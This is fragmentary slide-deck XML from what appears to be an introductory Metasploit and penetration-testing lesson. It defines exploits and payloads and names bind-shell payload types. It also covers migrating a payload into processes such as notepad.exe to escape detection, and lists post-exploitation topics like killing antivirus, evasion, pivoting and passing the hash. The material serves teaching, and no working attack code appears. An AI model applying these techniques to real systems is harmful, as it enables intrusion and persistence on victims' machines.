              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>wise to use commonly open ports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905125"/>
            <a:ext cx="50673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Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is the means by which an attacker/pen tester takes advantage of a flaw within a system (i.e. buffer overflow)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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: is the code we want the system to execute in the exploit.  The MSF allows you to select and deliver various payloads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>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Three types of payloads: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">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Singles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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windows/shell_bind_tcp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">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stagers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">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/shell/bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stager (bind_tcp), and stage (shell)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Metasploit terminology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web attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody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IF the user clicks yes, they can get pwned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Even easier with a valid certificate the browser trusts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64763"/>
            <a:ext cx="60960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web-attack vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody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Learned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231725"/>
            <a:ext cx="66675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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657850" y="5946550"/>
            <a:ext cx="5769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Actually safer to uninstall (in my opinion)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Note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457200" y="1447800"/>
            <a:ext cx="21357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This is somewhat detectable on the victims side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But even if the victim finds the process and kills it, they wont be safe.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attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>migrate the payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>to other processes.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notepad.exe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conhost.exe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etc.....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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385" y="105999"/>
            <a:ext cx="6535615" cy="664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81728" y="0"/>
            <a:ext cx="6862272" cy="6858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Post Exploitation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&amp; Meterpreter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killing antivirus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evasion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pivoting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passing the hash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and more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time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893000"/>
            <a:ext cx="8343900" cy="4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